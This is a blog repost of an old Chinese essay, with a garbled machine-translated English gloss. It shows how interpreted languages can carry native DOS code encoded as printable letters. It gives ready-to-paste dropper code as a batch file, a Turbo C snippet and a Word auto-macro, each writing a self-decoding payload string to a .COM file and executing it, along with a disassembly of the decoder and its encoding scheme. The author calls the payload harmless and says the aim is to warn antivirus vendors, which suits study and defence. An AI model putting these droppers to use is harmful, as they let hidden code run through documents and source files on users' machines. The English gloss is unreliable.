袁哥 Yuan brother
许多杀毒厂家谈到WORD宏病毒时,认为宏是解释执行,所以认为宏病毒很简单,关键技术在于WORD的文件格式。 Many anti-virus manufacturers when it comes WORD macro virus, that macro is interpreted, so that the macro virus is very simple, the key technology is the WORD file format. 我想提醒大家注意,解释执行虽然没有获得CPU的控制权,并不代表不能干大事。 I remind you, although not interpreted to obtain control of the CPU, does not mean you can not do big. 关键在于你提供的语言方便不方便。 The key is to provide you with the language of inconvenient. 其实解释型语言也可能获得CPU的控制大权的。 In fact, the language may be interpreted control of the CPU power of the. 所以JAVA也可能染毒! It may also be exposed to JAVA! 所以源文件型病毒并不需要很多专家说的那样要几百行的程序。 Therefore, the source file type virus does not need a lot of experts say, as to a few hundred lines of code.
下面是DOS下的。 Here is the DOS. BAT文件,你粘贴下来运行一下,你就会明白。 BAT file, you paste it down and run about, you will understand. 它会释放一提示。 It will release a prompt. 此只是一演示,不含病毒! This is only a demo, free of viruses! 但其中的技术完全可以在JAVA,WORD,源文件中实现,也很简单! But the technology can be in JAVA, WORD, the source file to achieve, it is very simple! 所以提醒大家(特别是一些杀毒厂家)应真正的理解解释执行与CPU代码执行在本质上并没有区别! So to remind everyone (especially some of the anti-virus manufacturers) should be interpreted to understand the real and CPU code execution and there is no difference in the nature!
:0jeX4e-005POP]hWeX5ddP^1,FFFFF1,FFF1,4rP^P_jeX4aPY-x-AAR`0`*=00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq : 0jeX4e-005POP] hWeX5ddP ^ 1, FFFFF1, FFF1, 4rP ^ P_jeX4aPY-x-AAR `0` *= 00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq
@ECHO OFF @ ECHO OFF
COPY %0.BAT /BC:\BATVIR.COM /B /Y COPY% 0.BAT / BC: \ BATVIR.COM / B / Y
C:\BATVIR.COM C: \ BATVIR.COM
DEL C:\BATVIR.COM DEL C: \ BATVIR.COM
此程序主要是用一段字符串(在这儿是BAT文件本身)作一文件,这在WORD宏,源程序,解释型的BASIC等等中不难实现。 The procedure is to use a string (here is a BAT file itself) to make a file, this macro in WORD, source code, interpreted BASIC, and so is not difficult to achieve. 而这一字符串又是CPU代码。 And this string is CPU code. 实际前一小段对后面的字符串解码,所以什么CPU代码都被转换成了字母。 Short before the actual decoding of the string back, so what CPU code is converted into letters. 然后加载这一文件,恐怕这一功能大多的语言都提供了。 Then load the file, I am afraid most of the functions of language are provided.
为什么要这么处理? Why should such a deal? 因为很多的解释型语言,源程序什么的都能很方便的进行字符的处理,而他们二进制处理不方便或者不能。 Because many of the interpreted language, the source of what can be very convenient for the handling of characters and their binary process is not convenient or not. 这就是这方面病毒少的原因。 This is the reason this virus less.
在这我要说明的是我不是教人编病毒,而是要提醒大家(特别的是一些杀毒厂家)应提前的预防这一方面的病毒。 In this I must say that I am not prepared to teach people the virus, but to remind everyone (especially of some anti-virus manufacturers) should be brought forward in the prevention of this virus. 虽然这可能将使这一方面的病毒很快出现,但我想技术上有这一可能,迟早都会出现,还不如我们早一点预防。 While this may make the virus in this area soon, but I think technically this may be, sooner or later will appear, not as we earlier prevention.
我是考虑JAVA到底会不会染毒想到这方面的,因为JAVA还有很多语言是解释执行,提供的函数,解释代码在病毒方面不够灵活,而CPU代码那就太方便了。 JAVA in the end I will not be considered exposed to think of this area, because there are many JAVA language is interpreted, provide functions, explained in the virus code is not flexible enough, and the CPU code would be too convenient. 归结起来就是解释型语言怎样与CPU代码结合。 Boils down to how the CPU interpreted language code combination. 一直没有说出这一点,而前段时间看到报道说国外有了这方面的病毒,(报道说你浏览别人的网页,不下栽任何软件,也会中毒!我想用这一方法不难实现!)还有有感于我们国内的一些杀毒厂家对解释执行的错误认识,所以说出来提醒大家注意。 Never say this, but some time ago is reported that this virus has been abroad, (reports that you view other people's pages, not Xiazai any software, will be poisoned! I would like to use this method is not difficult to achieve! ) There Responding to some of our domestic anti-virus manufacturers interpreted the mistake, so say it to draw attention.
turbo c 下的源文件病毒的实现: turbo c source files under the realization of the virus:
你把下面一段程序加到你的turbo c You put the following paragraph be added to your turbo c program
程序中,再如果VIR[]那一段驻留,自动把这一段加到你的C程序中,那这不就是源文件病毒了吗? Program, and then if the VIR [] that a resident, you are automatically added to this section of the C program, the source file that the virus is not that it? 简单吧? Simple, right? 想想多少语言的源文件能用同样的方法实现? Think about how many languages the same way as source files can be used to achieve? 恐怕大多数都能简单的实现吧! I am afraid that a simple majority can achieve it!
是不是源文件病毒并不象原来一些所谓的专家说的要几百的程序? Is not the original source file the virus is not as some so-called experts say that hundreds of the procedures to be?
char char
vir[]={":0jeX4e-005POP]hWeX5ddP^1,FFFFF1,FFF1,4rP^P_jeX4aPY-x-AAR`0`*=00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq"}; vir []={": 0jeX4e-005POP] hWeX5ddP ^ 1, FFFFF1, FFF1, 4rP ^ P_jeX4aPY-x-AAR `0` *= 00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq "};
int fp; int fp;
fp=creat("c:\\temp\\vir.com",0); fp = creat ("c: \ \ temp \ \ vir.com", 0);
write(fp,&vir,200); write (fp, & vir, 200);
close(fp); close (fp);
system("c:\\temp\\vir.com"); system ("c: \ \ temp \ \ vir.com");
WORD宏中实现的方法: WORD macro implemented method:
你把下面一段加到你的WORD自动宏中,再改改PRO$那一段,简单吧! You put the following paragraph be added to your WORD auto macro, then change to change PRO $ that period, simple! 别的语言你也该会了吧! The other language you will now!
Name$ = Environ$("tmp") + "\MACROVIR.COM" Name $ = Environ $ ("tmp") + "\ MACROVIR.COM"
Open Name$ For Output As #1 Open Name $ For Output As # 1
pro$ = pro $ =
":0jeX4e-005POP]hWeX5ddP^1,FFFFF1,FFF1,4rP^P_jeX4aPY-x-AAR`0`*=00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq" ": 0jeX4e-005POP] hWeX5ddP ^ 1, FFFFF1, FFF1, 4rP ^ P_jeX4aPY-x-AAR` 0 `*= 00uPBOIAAAAFKAOBPIDMCBALEAJMNCBJALIAAEMMNCBFEGIGFCAENGBGDHCGPHGGJHCHFHDCAGJHDCAGDGPGNGJGOGHCACOCOCOCOCOCOANAKCEAAqqqq"
Print #1, pro$ Print # 1, pro $
Close #1 Close # 1
Shell Name$ Shell Name $
WORD实际是用的VB,但也不完全一样。 WORD is actually used in VB, but not exactly the same. VB中OPEN有FOR VB in there FOR OPEN
BINARY(二进制)方式,WORD取消了,所以WORD中CPU代码可能不用字符串方式不太可能实现,Chr$等函数好象不太兼容,字符方式是为了兼容。 BINARY (binary) mode, WORD canceled, so the CPU WORD mode code may not have the string is not possible, Chr $ function if such is not compatible with the character mode to compatible. TURBO TURBO
C中你当然可以用__exit__等别的方法也很简单的实现! C, you can of course use other methods such __exit__ very simple to achieve! C中有指针,你也可以让你的CPU代码直接在内存中获得控制权! C, a pointer, you can make your code directly in memory of the CPU to get control!
下面是那一段字符串的代码: Here is a string of code that:
1EE7:0100 3A30 CMP DH,[BX+SI] ;这一语句前面是冒号,在BAT里是解释 1EE7: 0100 3A30 CMP DH, [BX + SI]; this statement in front of the colon, where is explained in the BAT
1EE7:0102 6A65 PUSH 65 ;'e' 1EE7: 0102 6A65 PUSH 65; 'e'
1EE7:0104 58 POP AX 1EE7: 0104 58 POP AX
1EE7:0105 3465 XOR AL,65 ;得到AX=0X0000 ;'e' 1EE7: 0105 3465 XOR AL, 65; get AX = 0X0000; 'e'
1EE7:0107 2D3030 SUB AX,3030 1EE7: 0107 2D3030 SUB AX, 3030
1EE7:010A 35504F XOR AX,4F50 1EE7: 010A 35504F XOR AX, 4F50
1EE7:010D 50 PUSH AX 1EE7: 010D 50 PUSH AX
1EE7:010E 5D POP BP ;得到BP=0X8080 1EE7: 010E 5D POP BP; get BP = 0X8080
1EE7:010F 685765 PUSH 6557 1EE7: 010F 685765 PUSH 6557
1EE7:0112 58 POP AX 1EE7: 0112 58 POP AX
1EE7:0113 356464 XOR AX,6464 ;得到AX=0X0133 1EE7: 0113 356464 XOR AX, 6464; get AX = 0X0133
1EE7:0116 50 PUSH AX 1EE7: 0116 50 PUSH AX
1EE7:0117 5E POP SI ;得到SI=AX=0X0133 1EE7: 0117 5E POP SI; get SI = AX = 0X0133
1EE7:0118 312C XOR [SI],BP ;字节[0X0133],[0X0134]的最高位置1 1EE7: 0118 312C XOR [SI], BP; byte [0X0133], [0X0134] the highest position 1
1EE7:011A 46 INC SI 1EE7: 011A 46 INC SI
1EE7:011B 46 INC SI 1EE7: 011B 46 INC SI
1EE7:011C 46 INC SI 1EE7: 011C 46 INC SI
1EE7:011D 46 INC SI 1EE7: 011D 46 INC SI
1EE7:011E 46 INC SI 1EE7: 011E 46 INC SI
1EE7:011F 312C XOR [SI],BP ;[0X138],[0X139] 1EE7: 011F 312C XOR [SI], BP; [0X138], [0X139]
1EE7:0121 46 INC SI 1EE7: 0121 46 INC SI
1EE7:0122 46 INC SI 1EE7: 0122 46 INC SI
1EE7:0123 46 INC SI 1EE7: 0123 46 INC SI
1EE7:0124 312C XOR [SI],BP ;[0X13B],[0X13C] 1EE7: 0124 312C XOR [SI], BP; [0X13B], [0X13C]
1EE7:0126 3472 XOR AL,72 ;'r' 1EE7: 0126 3472 XOR AL, 72; 'r'
1EE7:0128 50 PUSH AX ;得到AX=0X141=0X133XOR0X72 1EE7: 0128 50 PUSH AX; get AX = 0X141 = 0X133XOR0X72
1EE7:0129 5E POP SI ;得到SI=AX=0X141 1EE7: 0129 5E POP SI; get SI = AX = 0X141
1EE7:012A 50 PUSH AX 1EE7: 012A 50 PUSH AX
1EE7:012B 5F POP DI ;得到DI=AX=0X141 1EE7: 012B 5F POP DI; get DI = AX = 0X141
1EE7:012C 6A65 PUSH 65 ;'e' 1EE7: 012C 6A65 PUSH 65; 'e'
1EE7:012E 58 POP AX 1EE7: 012E 58 POP AX
1EE7:012F 3461 XOR AL,61 ;'a' 1EE7: 012F 3461 XOR AL, 61; 'a'
1EE7:0131 50 PUSH AX 1EE7: 0131 50 PUSH AX
1EE7:0132 59 POP CX ;得到CX=AX=0X04 1EE7: 0132 59 POP CX; get CX = AX = 0X04
1EE7:0133 AD LODSW ;在字符串中是0X2D, 1EE7: 0133 AD LODSW; in the string is 0X2D,
1EE7:0134 F8 CLC ;在字符串中是0X78, 1EE7: 0134 F8 CLC; in the string is 0X78,
1EE7:0135 2D4141 SUB AX,4141 1EE7: 0135 2D4141 SUB AX, 4141
1EE7:0138 D2E0 SHL AL,CL ;在字符串中是0X5260 1EE7: 0138 D2E0 SHL AL, CL; in the string is 0X5260
1EE7:013A 30E0 XOR AL,AH ;在字符串中是0X3060 1EE7: 013A 30E0 XOR AL, AH; in the string is 0X3060
1EE7:013C AA STOSB ;在字符串中是0X2A 1EE7: 013C AA STOSB; in the string is 0X2A
1EE7:013D 3D3030 CMP AX,3030 1EE7: 013D 3D3030 CMP AX, 3030
1EE7:0140 75F1 JNZ 0133 ;对0X141开始的字符串解码,qqqq是串结束 1EE7: 0140 75F1 JNZ 0133; the beginning of a string of 0X141 decoding, qqqq is the end of the string
- ;0XF1是PB解码的结果。 -; 0XF1 PB is the result of decoding.
这儿CPU代码编码方法: Here CPU code encoding method:
CPU代码的每一个字节用两个字母表示,用ABCDEFGH IJKLMNOP 分别表示01234567 89ABCDEF,解码方法相反的过程! CPU code, each byte with two letters, respectively, with ABCDEFGH IJKLMNOP 01234567 89ABCDEF, the process of decoding the opposite way!
Tidak ada komentar:
Posting Komentar